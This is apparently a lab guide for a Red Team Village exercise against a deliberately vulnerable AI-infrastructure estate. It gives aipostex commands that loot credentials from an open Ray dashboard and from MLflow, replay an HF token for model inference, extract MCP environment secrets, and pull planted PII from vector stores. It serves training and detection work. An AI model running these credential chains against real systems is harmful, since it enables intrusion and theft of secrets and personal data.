Start Here — Red Team Village Hands-On¶
This lab is ACME's shadow-AI estate — real AI infrastructure deployed the way teams actually leave it: an unauthenticated Ray cluster, an MLflow tracking server behind an auth gate, a LiteLLM proxy, vector databases, notebooks, a real MCP server, and a HuggingFace-style inference gateway.
The story you'll live: one open Ray dashboard on the ML-platform team's box leaks a credential
for the data-science team's MLflow, which leaks an inference token for the app team's serving
gateway — ending in real model generation. One foothold, three teams. And the same estate holds
ACME's acme-fraud-scorer model, customer PII in the RAG vector stores, and a Snowflake warehouse
credential sitting in an MLflow run parameter — all reachable once you're inside.
Your mission has three moves: map the estate → complete one real credential chain → score your coverage.
1. You are here¶
You have one foothold: the attack box. Everything else lives on the isolated lab bridge behind it — a flat estate where every service is reachable once you're on the box (the shadow-AI premise).
What you're scoring against
5 VMs · 29 service endpoints · 170 planted sensitive findings. The benchmark measures how much of the planted estate your scan surfaces — and grades every finding by proof strength (reachable → credential-gated read → state-change / real inference). It's a coverage report card, not CTF points.
2. Five-minute quickstart¶
# On the attack box (your VPN config + attack-box address are handed out at the table)
./aipostex version # confirm the binary is here
mkdir -p ~/lab-results # everything you collect lands here for scoring
./aipostex discover network --target 172.16.50.10 --ports 3000 --mode detect # smoke test
New here? Learning Path · VM map · Remote access
3. The guided chain¶
Run the ladder top-to-bottom, writing each result into ~/lab-results. Every hop loots the
credential the next hop needs — the output of one command is the input to the next.
# 1) Map the estate
./aipostex discover network --target 172.16.50.10,172.16.50.20,172.16.50.30,172.16.50.40 \
--format json -o ~/lab-results/discover.json
# 2) Ray dashboard (unauthenticated) — leaks the MLflow gateway credential in a job's runtime_env
./aipostex ray --target http://172.16.50.20:8265 jobs \
--format json -o ~/lab-results/ray.json
# 3) MLflow auth gateway — authenticate with the Ray-looted Basic credential; run params leak an HF token
./aipostex mlflow --target http://172.16.50.30:5000 \
--header "Authorization: Basic <ray-looted-basic>" runs --limit 20 \
--format json -o ~/lab-results/mlflow.json
# 4) HF TGI gateway — replay the looted HF token for REAL model inference
./aipostex huggingface --target http://172.16.50.40:8180 \
--header "Authorization: Bearer <mlflow-looted-hf-token>" \
generate --prompt "incident response playbook" --force-exploit \
--format json -o ~/lab-results/hf.json
The placeholders (<ray-looted-basic>, <mlflow-looted-hf-token>) are credentials you loot
from the previous step's output — that hand-off is the whole point. The MLflow hop at
ailab-ds:5000 is credential-gated (you need the Ray loot); the separate MLflow backend at
ailab-ml:5000 is directly exposed — both are realistic surfaces in an open estate.
Want it narrated step by step? Demo Walkthrough · Scenario 08 (the chain).
4. Score your assessment¶
You get a report card: coverage of the 170 planted findings, a per-category breakdown, and a proof-strength profile (how much you merely reached vs. read-with-credential vs. actually executed). It does not spoil the answers — it grades what your own scan surfaced. How the scoring + proof classification work: Scoring System · RRR Honesty Matrix.
5. If you finish early¶
The chain is one path through the estate. There's a lot more planted — point the tool at it:
# Real MCP server (dev workstation) — discovers /mcp, lands command-exec + file-read + env leak
./aipostex mcp --target http://172.16.50.10:3000 enum
./aipostex mcp --target http://172.16.50.10:3000 env-extract
# Vector DBs — extract planted PII from RAG stores
./aipostex vectordb --type chromadb --target 172.16.50.20:8000 search-sensitive --limit 50
# A2A agents, model registry tampering, W&B, Kubeflow
./aipostex a2a --target http://172.16.50.40:8100 enum
./aipostex mlflow --target http://172.16.50.20:5000 registry
./aipostex wandb --target http://172.16.50.20:8444 enum
Full menu: Attack Scenarios (12 of them).
6. Take it home — and build the corpus¶
Everything is open-source. Run the whole estate on your own Proxmox/cloud, or point the tool at your own AI stack.
- Tool — github.com/professor-moody/aipostex · docs · releases
- Lab — github.com/professor-moody/aipostex-lab · Quick Start
The binary is just the runner. The durable, shared artifact is the AI-infra detection corpus — the after-action loop is: observe a weird AI service → write a template → lint → run it → PR it.
# run your own templates alongside the built-in set
aipostex scan targets --target http://host:port --templates-dir ./aipostex-templates
- Find a weird AI service in the wild.
- Write a YAML template for it.
- Lint it:
aipostex templates lint --templates-dir . - Test it against this lab or a real instance.
-
Open a PR — the strongest community templates get promoted into the core.
-
Community templates — github.com/professor-moody/aipostex-templates · authoring guide · wanted templates
Community is the incubator, not the trusted core
The binary ships a curated, release-tested template set. Community templates are a fast-moving, PR-driven, linted lane; the strongest ones get promoted into the core after review and lab proof.